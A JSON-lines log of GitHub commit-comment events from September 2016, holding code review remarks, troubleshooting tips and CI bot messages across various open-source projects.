{"id":"4562112922","type":"CommitCommentEvent","actor":{"login":"Dokman"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19019271,"position":null,"line":null,"path":null,"commit_id":"de480ec0f5d5bc36a87587c08b9bb7dbd584889f","created_at":"2016-09-14T13:58:22Z","updated_at":"2016-09-14T13:58:22Z","body":"with a 0x9C712FF0 i have the same bug :("}},"created_at":"2016-09-14T13:58:22Z"}
{"id":"4562113934","type":"CommitCommentEvent","actor":{"login":"lspdv"},"repo":{"name":"PyLadiesCZ/pyladies.cz"},"payload":{"comment":{"id":19019273,"position":null,"line":null,"path":null,"commit_id":"16c41aeb3ba597daed52c3ebce80d6f4a8836386","created_at":"2016-09-14T13:58:31Z","updated_at":"2016-09-14T13:58:31Z","body":"ted je to krasne! dik ❤️ "}},"created_at":"2016-09-14T13:58:31Z"}
{"id":"4562116503","type":"CommitCommentEvent","actor":{"login":"hadess"},"repo":{"name":"libretro/RetroArch"},"payload":{"comment":{"id":19019284,"position":118,"line":669,"path":"gfx/common/x11_common.c","commit_id":"05df632bd828d7cac1b4c2ca134e94fbdfabc1ab","created_at":"2016-09-14T13:58:56Z","updated_at":"2016-09-14T13:58:56Z","body":"Should be:\r\n`if (dbus_connection != NULL && dbus_screensaver_cookie > 0)`"}},"created_at":"2016-09-14T13:58:56Z"}
{"id":"4562119458","type":"CommitCommentEvent","actor":{"login":"sidharthc"},"repo":{"name":"sidharthc/Dictionary"},"payload":{"comment":{"id":19019291,"position":5,"line":63,"path":"hipdict/main.py","commit_id":"217d35ba73c9dcdb8ab3ee1d9758b6d925475d1b","created_at":"2016-09-14T13:59:25Z","updated_at":"2016-09-14T13:59:25Z","body":"test"}},"created_at":"2016-09-14T13:59:25Z"}
{"id":"4562121295","type":"CommitCommentEvent","actor":{"login":"hadess"},"repo":{"name":"libretro/RetroArch"},"payload":{"comment":{"id":19019296,"position":19,"line":158,"path":"gfx/common/x11_common.c","commit_id":"05df632bd828d7cac1b4c2ca134e94fbdfabc1ab","created_at":"2016-09-14T13:59:42Z","updated_at":"2016-09-14T13:59:42Z","body":"I'd run this first, and not run xdg-screensaver at all if it worked."}},"created_at":"2016-09-14T13:59:42Z"}
{"id":"4562124321","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19019304,"position":null,"line":null,"path":null,"commit_id":"1e2b234e198744dd41c2af00177392cf62dab566","created_at":"2016-09-14T14:00:16Z","updated_at":"2016-09-14T14:00:16Z","body":"[Code coverage](https://100-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**"}},"created_at":"2016-09-14T14:00:16Z"}
{"id":"4562126587","type":"CommitCommentEvent","actor":{"login":"bogdando"},"repo":{"name":"bogdando/kargo"},"payload":{"comment":{"id":19019307,"position":21,"line":33,"path":"roles/download/defaults/main.yml","commit_id":"f216083083f293b77a20812a24787c9cba52b0d0","created_at":"2016-09-14T14:00:37Z","updated_at":"2016-09-14T14:00:37Z","body":"I can't delete them. They will be used in docker create/cp/run tasks. Those to be shared by distinct roles - downloads, then its own $role"}},"created_at":"2016-09-14T14:00:37Z"}
{"id":"4562130360","type":"CommitCommentEvent","actor":{"login":"awhiemstra"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19019312,"position":null,"line":null,"path":null,"commit_id":"31b0f748744b1bc957ab74ea5bdffa18a830935d","created_at":"2016-09-14T14:01:15Z","updated_at":"2016-09-14T14:01:15Z","body":"I am not really sure why we care about https here anyway. It is not like this is sending sensitive user data. If it does, we are doing something wrong!"}},"created_at":"2016-09-14T14:01:15Z"}
{"id":"4562132787","type":"CommitCommentEvent","actor":{"login":"sthalik"},"repo":{"name":"opentrack/opentrack"},"payload":{"comment":{"id":19019320,"position":null,"line":null,"path":null,"commit_id":"dec625e51878c9167100837086f82fb0f78b0189","created_at":"2016-09-14T14:01:37Z","updated_at":"2016-09-14T14:01:37Z","body":"@DaMichel the official build is 32-bit. This is a COM issue. Depending on how COM feels at a given time we might get freezes accessing joystick keybindings or axis, listing cameras, opening the camera itself, etc. One thing COM is consistent about is not liking the threading apartment of the camera dialog thread."}},"created_at":"2016-09-14T14:01:37Z"}
{"id":"4562138473","type":"CommitCommentEvent","actor":{"login":"bchartier"},"repo":{"name":"geobretagne/mdchecker"},"payload":{"comment":{"id":19019343,"position":null,"line":null,"path":null,"commit_id":"1c7d64331f81065489cce8a55df0347d8122b6e8","created_at":"2016-09-14T14:02:32Z","updated_at":"2016-09-14T14:02:32Z","body":"Fixes #12 instead of 8, sorry"}},"created_at":"2016-09-14T14:02:32Z"}
{"id":"4562138565","type":"CommitCommentEvent","actor":{"login":"Thanood"},"repo":{"name":"aurelia-ui-toolkits/aurelia-materialize-bridge"},"payload":{"comment":{"id":19019345,"position":null,"line":null,"path":null,"commit_id":"9efddc28efb1ad2555bbd3e3ca0660814eadeeb8","created_at":"2016-09-14T14:02:33Z","updated_at":"2016-09-14T14:02:33Z","body":"Right.. `r.js` is actually a bash script. :smile: \r\nForget the node call please.\r\n\r\nCan you try running this in any bash compatible shell? Like \"gitbash\" or something like that?\r\nIf that doesn't work:\r\n```\r\n./node_modules/.bin/r.js.cmd -o rbuild.js\r\n```\r\n"}},"created_at":"2016-09-14T14:02:33Z"}
{"id":"4562141303","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19019362,"position":null,"line":null,"path":null,"commit_id":"e1c66fd02f599ec8b77c96fb65d2bcf2609407e4","created_at":"2016-09-14T14:02:58Z","updated_at":"2016-09-14T14:02:58Z","body":"[Code coverage](https://101-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**"}},"created_at":"2016-09-14T14:02:58Z"}
{"id":"4562141549","type":"CommitCommentEvent","actor":{"login":"pmario"},"repo":{"name":"Jermolene/TiddlyWiki5"},"payload":{"comment":{"id":19019367,"position":6,"line":15,"path":"core/palettes/Blanca.tid","commit_id":"16301532bfed17564e175b066ba4f8da1ee70ffe","created_at":"2016-09-14T14:03:00Z","updated_at":"2016-09-14T14:03:00Z","body":"may be [unset](https://developer.mozilla.org/en-US/docs/Web/CSS/unset) is an option, to avoid the debugger problems."}},"created_at":"2016-09-14T14:03:00Z"}
{"id":"4562143034","type":"CommitCommentEvent","actor":{"login":"lasley"},"repo":{"name":"OCA/social"},"payload":{"comment":{"id":19019381,"position":null,"line":null,"path":null,"commit_id":"ee76f1adcbf4d3a07f764f22442a79245e766088","created_at":"2016-09-14T14:03:18Z","updated_at":"2016-09-14T14:03:18Z","body":"The malicious user would still have to brute force the API key in order to do anything as well. These webhooks were designed to be public facing w/ no auth.\r\n\r\n:+1 from me"}},"created_at":"2016-09-14T14:03:18Z"}
{"id":"4562143249","type":"CommitCommentEvent","actor":{"login":"ledvinap"},"repo":{"name":"cleanflight/cleanflight"},"payload":{"comment":{"id":19019382,"position":null,"line":null,"path":null,"commit_id":"2507b90a2827496fd9aae04624bc2a8aabbb64f3","created_at":"2016-09-14T14:03:19Z","updated_at":"2016-09-14T14:03:19Z","body":"@hydra: Value is displayed as signed decimal. Using decadic encoding allows humans to decode the value.\r\n "}},"created_at":"2016-09-14T14:03:19Z"}
{"id":"4562146951","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19019392,"position":3,"line":30,"path":"src/SkirtBrim.cpp","commit_id":"dc97b5f312b3537976d048269d191ddefecfe5ec","created_at":"2016-09-14T14:03:55Z","updated_at":"2016-09-14T14:03:55Z","body":"Outdated comment?"}},"created_at":"2016-09-14T14:03:55Z"}
{"id":"4562147025","type":"CommitCommentEvent","actor":{"login":"bruno-serfe"},"repo":{"name":"aslubsky/ng2-select"},"payload":{"comment":{"id":19019393,"position":null,"line":null,"path":null,"commit_id":"9762fb1362730ed258509dba58876363f01f9211","created_at":"2016-09-14T14:03:56Z","updated_at":"2016-09-14T14:03:56Z","body":"Hi @aslubsky Thanks, isolated works but with my package.json have some kind of troubles, I've managed to installing removing the node_modules folder and then installing your package by doing: \r\nsudo npm install git+https://github.com/aslubsky/ng2-select.git --save that was added the package in both dependecies (\"dependencies\" & \"devDependencies\") after that works fine.\r\n\r\nThank you for your help"}},"created_at":"2016-09-14T14:03:56Z"}
{"id":"4562148171","type":"CommitCommentEvent","actor":{"login":"flavvita"},"repo":{"name":"Pronatec-Unit/Bibliotec"},"payload":{"comment":{"id":19019396,"position":null,"line":null,"path":null,"commit_id":"15d38dba15c09828290fac00c14adc530a5be3f9","created_at":"2016-09-14T14:04:09Z","updated_at":"2016-09-14T14:04:09Z","body":"Essa tela aparecerá tantopara o usuário que possui o cadastro quanto para o que não possui tambem"}},"created_at":"2016-09-14T14:04:09Z"}
{"id":"4562148232","type":"CommitCommentEvent","actor":{"login":"mattymo"},"repo":{"name":"bogdando/kargo"},"payload":{"comment":{"id":19019397,"position":21,"line":33,"path":"roles/download/defaults/main.yml","commit_id":"f216083083f293b77a20812a24787c9cba52b0d0","created_at":"2016-09-14T14:04:10Z","updated_at":"2016-09-14T14:04:10Z","body":"Those roles depend on download role and will therefore have all these variables accessible :)"}},"created_at":"2016-09-14T14:04:10Z"}
{"id":"4562149841","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19019399,"position":null,"line":null,"path":null,"commit_id":"959128179ece6069beb1b43abf24a0961e6d1896","created_at":"2016-09-14T14:04:25Z","updated_at":"2016-09-14T14:04:25Z","body":"Dodge!"}},"created_at":"2016-09-14T14:04:25Z"}
{"id":"4562150281","type":"CommitCommentEvent","actor":{"login":"andy-ms"},"repo":{"name":"Microsoft/TypeScript"},"payload":{"comment":{"id":19019402,"position":9,"line":1687,"path":"src/harness/fourslash.ts","commit_id":"4a37fd7bcfa3a10020337dd032fef81dda625bac","created_at":"2016-09-14T14:04:28Z","updated_at":"2016-09-14T14:04:28Z","body":"This number is compared to 0, and it looks like it's only 0 if `implementations` is undefined, so you may as well just test for that."}},"created_at":"2016-09-14T14:04:28Z"}
{"id":"4562150591","type":"CommitCommentEvent","actor":{"login":"Thanood"},"repo":{"name":"aurelia-ui-toolkits/aurelia-materialize-bridge"},"payload":{"comment":{"id":19019403,"position":null,"line":null,"path":null,"commit_id":"9efddc28efb1ad2555bbd3e3ca0660814eadeeb8","created_at":"2016-09-14T14:04:32Z","updated_at":"2016-09-14T14:04:32Z","body":"I wonder if we put this in `package.json` as a script it could be run from `npm run ...` without problems.\r\n"}},"created_at":"2016-09-14T14:04:32Z"}
{"id":"4562153411","type":"CommitCommentEvent","actor":{"login":"Ellpeck"},"repo":{"name":"Ellpeck/ActuallyAdditions"},"payload":{"comment":{"id":19019410,"position":null,"line":null,"path":null,"commit_id":"541410be5e38a3d951c18c10e38a69d5df319a3e","created_at":"2016-09-14T14:04:59Z","updated_at":"2016-09-14T14:04:59Z","body":"You're right! Can you post it as an issue? Otherwise I'll forget :D"}},"created_at":"2016-09-14T14:04:59Z"}
{"id":"4562153890","type":"CommitCommentEvent","actor":{"login":"IceN9ne"},"repo":{"name":"kvirc/KVIrc"},"payload":{"comment":{"id":19019414,"position":null,"line":null,"path":null,"commit_id":"eba87768bc7394b5dc5d62c5e6274fae53039ab8","created_at":"2016-09-14T14:05:05Z","updated_at":"2016-09-14T14:05:05Z","body":"Try `>>> \\r!nc\\r%Q\\r]:` and see how it works for both nick and channel targets.  Does this do what you want by properly creating links for both nicks and channels?"}},"created_at":"2016-09-14T14:05:05Z"}
{"id":"4562159282","type":"CommitCommentEvent","actor":{"login":"NoSpamDan"},"repo":{"name":"BrokenROM/device_oneplus_bacon"},"payload":{"comment":{"id":19019432,"position":19,"line":31,"path":"init/init_bacon.cpp","commit_id":"8fa7b2d55d69290376972f8830a6fdcf3ebc8fca","created_at":"2016-09-14T14:05:58Z","updated_at":"2016-09-14T14:05:58Z","body":"Lookin' good... :smiley: "}},"created_at":"2016-09-14T14:05:58Z"}
{"id":"4562163220","type":"CommitCommentEvent","actor":{"login":"Omega094"},"repo":{"name":"nirvananoob/leetcode"},"payload":{"comment":{"id":19019440,"position":null,"line":null,"path":null,"commit_id":"5d76c454f89b11cdde7656e93bf1ca5d77db3463","created_at":"2016-09-14T14:06:30Z","updated_at":"2016-09-14T14:06:30Z","body":"强无敌\r\n@puchai"}},"created_at":"2016-09-14T14:06:30Z"}
{"id":"4562164077","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19019441,"position":null,"line":null,"path":null,"commit_id":"fda4c7271aa75e24936e81d33ccbc38f7014a763","created_at":"2016-09-14T14:06:39Z","updated_at":"2016-09-14T14:06:39Z","body":"TeamCity Todo :: Build [Build 96](http://109.103.226.38:8512/viewLog.html?buildId=38491&buildTypeId=Todo_Build) is now running\n"}},"created_at":"2016-09-14T14:06:39Z"}
{"id":"4562167186","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19019444,"position":null,"line":null,"path":null,"commit_id":"fda4c7271aa75e24936e81d33ccbc38f7014a763","created_at":"2016-09-14T14:07:10Z","updated_at":"2016-09-14T14:07:10Z","body":"TeamCity Todo :: Build [Build 96](http://109.103.226.38:8512/viewLog.html?buildId=38491&buildTypeId=Todo_Build) outcome was **FAILURE**\nSummary: Tests passed: 12; exit code 1 (new) Build time: 00:00:33"}},"created_at":"2016-09-14T14:07:10Z"}
{"id":"4562171343","type":"CommitCommentEvent","actor":{"login":"andy-ms"},"repo":{"name":"Microsoft/TypeScript"},"payload":{"comment":{"id":19019452,"position":87,"line":5063,"path":"src/services/services.ts","commit_id":"4a37fd7bcfa3a10020337dd032fef81dda625bac","created_at":"2016-09-14T14:07:48Z","updated_at":"2016-09-14T14:07:48Z","body":"You can just return this rather than `if (...) return true`"}},"created_at":"2016-09-14T14:07:48Z"}
{"id":"4562171653","type":"CommitCommentEvent","actor":{"login":"filipecifali"},"repo":{"name":"pythonbrasil/associados"},"payload":{"comment":{"id":19019453,"position":14,"line":107,"path":"app/members/views.py","commit_id":"2d9010d5a151db9ca6bf1ee2c26a5aa526ccf25a","created_at":"2016-09-14T14:07:52Z","updated_at":"2016-09-14T14:07:52Z","body":"Troquei, vamos ver se fica direitinho, mas acho que vou acabar fazendo um cli pra não expor esses dados... "}},"created_at":"2016-09-14T14:07:52Z"}
{"id":"4562174958","type":"CommitCommentEvent","actor":{"login":"awhiemstra"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19019461,"position":5,"line":420,"path":"src/utils/polygon.cpp","commit_id":"26757ef8020f1d3d01e23348bab5cefb332cfb47","created_at":"2016-09-14T14:08:25Z","updated_at":"2016-09-14T14:08:25Z","body":"Note that you should include <cmath> not <math.h>."}},"created_at":"2016-09-14T14:08:25Z"}
{"id":"4562176255","type":"CommitCommentEvent","actor":{"login":"rektide"},"repo":{"name":"facebook/mcrouter"},"payload":{"comment":{"id":19019462,"position":null,"line":null,"path":null,"commit_id":"3a292214d4d81d5b7c8ef83da06228b910c8cd82","created_at":"2016-09-14T14:08:37Z","updated_at":"2016-09-14T14:08:37Z","body":"Hey, there's two facebook internal links in this commit description. Might those be brought onto the Mcrouter wiki, or otherwise made available?\r\n[zstd reveal post](https://code.facebook.com/posts/1658392934479273/smaller-and-faster-data-compression-with-zstandard/) probably contains a significant amount of the information in the [first link](https://our.intern.facebook.com/intern/wiki/Benchmarking_ZSTD_and_LZ4_algorithms/), but I'm very very interested in getting access to the [second link](https://our.intern.facebook.com/intern/wiki/Compression_with_specialized_dictionaries/).\r\n\r\nThis is one of the first major zstd sightings in the wild! Way cool to see!"}},"created_at":"2016-09-14T14:08:37Z"}
{"id":"4562178694","type":"CommitCommentEvent","actor":{"login":"raghuugare"},"repo":{"name":"raghuugare/rags_snakes"},"payload":{"comment":{"id":19019467,"position":null,"line":null,"path":null,"commit_id":"14d8b25aa5902ff122acb68715ea714cd5f882e6","created_at":"2016-09-14T14:09:02Z","updated_at":"2016-09-14T14:09:02Z","body":"Fixes the issue: #1 "}},"created_at":"2016-09-14T14:09:02Z"}
{"id":"4562183517","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19019478,"position":null,"line":null,"path":null,"commit_id":"18ba828728c0fdea5ff74379f2ca91fef5172cb0","created_at":"2016-09-14T14:09:50Z","updated_at":"2016-09-14T14:09:50Z","body":"input_processor_refactor (mbadams5) - i386-Windows-7-VisualStudio-12: Build Failed\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-18ba828728c0fdea5ff74379f2ca91fef5172cb0-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-18ba828728c0fdea5ff74379f2ca91fef5172cb0-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-50.7%25-red.svg)</a> \n"}},"created_at":"2016-09-14T14:09:50Z"}
{"id":"4562186145","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19019483,"position":null,"line":null,"path":null,"commit_id":"31b0f748744b1bc957ab74ea5bdffa18a830935d","created_at":"2016-09-14T14:10:18Z","updated_at":"2016-09-14T14:10:18Z","body":"We're sending data, period. A third party has no business knowing that I am slicing with Cura. HTTPS or nothing, in my opinion."}},"created_at":"2016-09-14T14:10:18Z"}
{"id":"4562186524","type":"CommitCommentEvent","actor":{"login":"KoryNunn"},"repo":{"name":"LanguagePlayGround/resolve-queue"},"payload":{"comment":{"id":19019484,"position":null,"line":null,"path":null,"commit_id":"9c972386bc35c0a1bbaf1b1eddb61532749aebfe","created_at":"2016-09-14T14:10:21Z","updated_at":"2016-09-14T14:10:21Z","body":"Hi @LanguagePlayGround, This lib kinda inspired my other lib, `righto` https://github.com/KoryNunn/righto which therefore might be something you would be interested in instead."}},"created_at":"2016-09-14T14:10:21Z"}
{"id":"4562189422","type":"CommitCommentEvent","actor":{"login":"NerV-0-sol"},"repo":{"name":"PhilJay/MPAndroidChart"},"payload":{"comment":{"id":19019496,"position":5,"line":731,"path":"MPChartLib/src/com/github/mikephil/charting/renderer/LineChartRenderer.java","commit_id":"ab424e69d853a53cc39dfe48dcb7cf90d8936316","created_at":"2016-09-14T14:10:48Z","updated_at":"2016-09-14T14:10:48Z","body":"This makes my app crash on API level 10 with NullPointerException at android.graphics.Canvas.setBitmap(Canvas.java:143)"}},"created_at":"2016-09-14T14:10:48Z"}
{"id":"4562191656","type":"CommitCommentEvent","actor":{"login":"staabm"},"repo":{"name":"yakamara/redaxo_yrewrite"},"payload":{"comment":{"id":19019504,"position":14,"line":62,"path":"install.php","commit_id":"9e04945a2a771353a4c8f5f02f0b4c8d7667e4f5","created_at":"2016-09-14T14:11:14Z","updated_at":"2016-09-14T14:11:14Z","body":"fehlt hier jetzt noch irgendwo eine tabelle/eine spalte in der die domain ausgeschrieben drinnen stehen muss (mit primary keys für domain_id etc)?"}},"created_at":"2016-09-14T14:11:14Z"}
{"id":"4562193320","type":"CommitCommentEvent","actor":{"login":"darck333"},"repo":{"name":"chinoogawa/fbht"},"payload":{"comment":{"id":19019509,"position":null,"line":null,"path":null,"commit_id":"95c8bd53f69fb97b7ec609b19a3237e86cb1fd38","created_at":"2016-09-14T14:11:30Z","updated_at":"2016-09-14T14:11:30Z","body":"not working bad programation\r\n:-1: "}},"created_at":"2016-09-14T14:11:30Z"}
{"id":"4562209291","type":"CommitCommentEvent","actor":{"login":"Nyks45"},"repo":{"name":"Nyks45/OctoDex-Kernel"},"payload":{"comment":{"id":19019547,"position":null,"line":null,"path":null,"commit_id":"d6066525fc4e96cd6ce180922f2e47c5363f039e","created_at":"2016-09-14T14:14:03Z","updated_at":"2016-09-14T14:14:03Z","body":"and for that look the commit i mentioned i can understand u but this is a cherry-pick so u can't want morr credit it is in commit\r\n did i copy paste and wrote it is completelly belongs to me????\r\nno\r\ndid i cherry-pick FROM YOU???\r\nyes\r\n"}},"created_at":"2016-09-14T14:14:03Z"}
{"id":"4562211120","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19019553,"position":null,"line":null,"path":null,"commit_id":"76d646906cc16a5598b655ef18ac8526c30bae1e","created_at":"2016-09-14T14:14:21Z","updated_at":"2016-09-14T14:14:21Z","body":"lgtm, boring"}},"created_at":"2016-09-14T14:14:21Z"}
{"id":"4562211583","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19019554,"position":14,"line":40,"path":"src/SkirtBrim.cpp","commit_id":"dc97b5f312b3537976d048269d191ddefecfe5ec","created_at":"2016-09-14T14:14:26Z","updated_at":"2016-09-14T14:14:26Z","body":"So if the brim line width is 0.4mm and there happens to be a gap of 4.4mm between two model pieces, with support between them, there will be a strip of 0.4mm in the middle which gets support because two lines of brim wouldn't fit in there? Is that intended?"}},"created_at":"2016-09-14T14:14:26Z"}
{"id":"4562213808","type":"CommitCommentEvent","actor":{"login":"rvock"},"repo":{"name":"dmitryd/typo3-realurl"},"payload":{"comment":{"id":19019557,"position":null,"line":null,"path":null,"commit_id":"d4de3d53c8b4fc4aa0f5cdf327ae8cd7893821b7","created_at":"2016-09-14T14:14:48Z","updated_at":"2016-09-14T14:14:48Z","body":"I think, you are missing the u-modifier.\r\n\r\nTested with PHP 5.6.24 on OS X:\r\n```php\r\n$string = 'asdf' . html_entity_decode('&nbsp;') . 'asdf';\r\n$string = preg_replace('/[\\s\\x{00A0}\\-+_]+/', '-', $string);\r\necho $string;\r\n```\r\nOutputs: `asdf�-asdf`\r\n\r\nThis works:\r\n```php\r\n$string = 'asdf' . html_entity_decode('&nbsp;') . 'asdf';\r\n$string = preg_replace('/[\\s\\x{00A0}\\-+_]+/u', '-', $string);\r\necho $string;\r\n```\r\n\r\nMy code also worked:\r\n```php\r\n$string = 'asdf' . html_entity_decode('&nbsp;') . 'asdf';\r\n$string = preg_replace('/[\\s\\x{c2a0}\\-+_]+/u', '-', $string);\r\necho $string;\r\n```\r\n\r\nBoth output `asdf-asdf`"}},"created_at":"2016-09-14T14:14:48Z"}
{"id":"4562214890","type":"CommitCommentEvent","actor":{"login":"andy-ms"},"repo":{"name":"Microsoft/TypeScript"},"payload":{"comment":{"id":19019561,"position":114,"line":5084,"path":"src/services/services.ts","commit_id":"4a37fd7bcfa3a10020337dd032fef81dda625bac","created_at":"2016-09-14T14:14:58Z","updated_at":"2016-09-14T14:14:58Z","body":"If `node.parent.kind` is currently always the same I don't know if it should be tested. I know I said something about testing the type of the parent, but testing something that's always true is silly. Maybe assert?\r\n```ts\r\nDebug.assert(node.parent.kind === SyntaxKind.VariableDeclarationList &&\r\n    node.parent.parent.kind === SyntaxKind.VariableStatement);\r\nreturn <VariableStatement>node.parent.parent;\r\n```"}},"created_at":"2016-09-14T14:14:58Z"}
{"id":"4562215343","type":"CommitCommentEvent","actor":{"login":"bojand"},"repo":{"name":"atrites/lounge"},"payload":{"comment":{"id":19019562,"position":5,"line":323,"path":"lib/utils.js","commit_id":"21547499cd4f692213457ad67227a503c8842081","created_at":"2016-09-14T14:15:03Z","updated_at":"2016-09-14T14:15:03Z","body":"i would say these should have stayed in cb doc util file... just as actual separate functions there... these aren't really useful anywhere else except within the context of that file for those functions."}},"created_at":"2016-09-14T14:15:03Z"}
{"id":"4562218002","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19019569,"position":null,"line":null,"path":null,"commit_id":"204963cce71438bcc7d3821601e2964899458d67","created_at":"2016-09-14T14:15:31Z","updated_at":"2016-09-14T14:15:31Z","body":"lgtm, boring"}},"created_at":"2016-09-14T14:15:31Z"}
{"id":"4562219256","type":"CommitCommentEvent","actor":{"login":"datnguyen31296"},"repo":{"name":"vuongquocviet/Egg-Shoot"},"payload":{"comment":{"id":19019573,"position":6,"line":6,"path":"DanhSachNhom","commit_id":"9c345cee9a3b30a3841b0f9c25904db3b6c240e7","created_at":"2016-09-14T14:15:43Z","updated_at":"2016-09-14T14:15:43Z","body":"14082491"}},"created_at":"2016-09-14T14:15:43Z"}
{"id":"4562219350","type":"CommitCommentEvent","actor":{"login":"bojand"},"repo":{"name":"atrites/lounge"},"payload":{"comment":{"id":19019575,"position":3,"line":3,"path":"lib/cbdocument.utils.js","commit_id":"21547499cd4f692213457ad67227a503c8842081","created_at":"2016-09-14T14:15:43Z","updated_at":"2016-09-14T14:15:43Z","body":"these probably should stay here, just as separate functions, not within the lexical closure of the functions that use them."}},"created_at":"2016-09-14T14:15:43Z"}
{"id":"4562223059","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19019586,"position":null,"line":null,"path":null,"commit_id":"b9ca5b9997ac3a23d8aa9a3e9b991327839b67ee","created_at":"2016-09-14T14:16:21Z","updated_at":"2016-09-14T14:16:21Z","body":"lgtm, boring"}},"created_at":"2016-09-14T14:16:21Z"}
{"id":"4562223881","type":"CommitCommentEvent","actor":{"login":"mull"},"repo":{"name":"GitbookIO/slate-edit-list"},"payload":{"comment":{"id":19019592,"position":null,"line":null,"path":null,"commit_id":"00da2984516e2f8a66ccdd89aefa47348533527a","created_at":"2016-09-14T14:16:29Z","updated_at":"2016-09-14T14:16:29Z","body":"Could we get a new release as well? :dancers:"}},"created_at":"2016-09-14T14:16:29Z"}
{"id":"4562224784","type":"CommitCommentEvent","actor":{"login":"bogdando"},"repo":{"name":"bogdando/kargo"},"payload":{"comment":{"id":19019593,"position":36,"line":38,"path":"roles/download/tasks/main.yml","commit_id":"f216083083f293b77a20812a24787c9cba52b0d0","created_at":"2016-09-14T14:16:37Z","updated_at":"2016-09-14T14:16:37Z","body":"Nope. I took it from the pattern we have in place,the plan B is only commets"}},"created_at":"2016-09-14T14:16:37Z"}
{"id":"4562225545","type":"CommitCommentEvent","actor":{"login":"datnguyen31296"},"repo":{"name":"vuongquocviet/Egg-Shoot"},"payload":{"comment":{"id":19019597,"position":6,"line":6,"path":"DanhSachNhom","commit_id":"9c345cee9a3b30a3841b0f9c25904db3b6c240e7","created_at":"2016-09-14T14:16:44Z","updated_at":"2016-09-14T14:16:44Z","body":"****14082491"}},"created_at":"2016-09-14T14:16:44Z"}
{"id":"4562226288","type":"CommitCommentEvent","actor":{"login":"bojand"},"repo":{"name":"atrites/lounge"},"payload":{"comment":{"id":19019599,"position":9,"line":327,"path":"lib/utils.js","commit_id":"21547499cd4f692213457ad67227a503c8842081","created_at":"2016-09-14T14:16:52Z","updated_at":"2016-09-14T14:16:52Z","body":"this should be `const`"}},"created_at":"2016-09-14T14:16:52Z"}
{"id":"4562227252","type":"CommitCommentEvent","actor":{"login":"bojand"},"repo":{"name":"atrites/lounge"},"payload":{"comment":{"id":19019603,"position":10,"line":328,"path":"lib/utils.js","commit_id":"21547499cd4f692213457ad67227a503c8842081","created_at":"2016-09-14T14:17:01Z","updated_at":"2016-09-14T14:17:01Z","body":"what does this name mean?"}},"created_at":"2016-09-14T14:17:01Z"}
{"id":"4562227647","type":"CommitCommentEvent","actor":{"login":"bogdando"},"repo":{"name":"bogdando/kargo"},"payload":{"comment":{"id":19019605,"position":2,"line":2,"path":"roles/download/handlers/main.yml","commit_id":"f216083083f293b77a20812a24787c9cba52b0d0","created_at":"2016-09-14T14:17:06Z","updated_at":"2016-09-14T14:17:06Z","body":"syncronize compresses on a fly, nice!"}},"created_at":"2016-09-14T14:17:06Z"}
{"id":"4562229410","type":"CommitCommentEvent","actor":{"login":"jnyrup"},"repo":{"name":"jnyrup/PDFsharp"},"payload":{"comment":{"id":19019612,"position":null,"line":null,"path":null,"commit_id":"d52d44a696bd4216e2bddd94823842a0ad57da1c","created_at":"2016-09-14T14:17:23Z","updated_at":"2016-09-14T14:17:23Z","body":"@RBrNx Awesome!\r\nIf you'd like to make a PR for this repo, just let me know and I'll wait for your PR.\r\nIf you'd rather avoid git, that's also fine, then I'll probably look at it sometime this week."}},"created_at":"2016-09-14T14:17:23Z"}
{"id":"4562230511","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19019613,"position":null,"line":null,"path":null,"commit_id":"f9d93321f31726b3312ba78ba9b608631a21e800","created_at":"2016-09-14T14:17:32Z","updated_at":"2016-09-14T14:17:32Z","body":"[Code coverage](https://102-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**"}},"created_at":"2016-09-14T14:17:32Z"}
{"id":"4562233264","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19019627,"position":null,"line":null,"path":null,"commit_id":"02d6dbf8f6ece6760df7a7a8cdb30d11b94b2285","created_at":"2016-09-14T14:17:57Z","updated_at":"2016-09-14T14:17:57Z","body":"lgtm, keep separate."}},"created_at":"2016-09-14T14:17:57Z"}
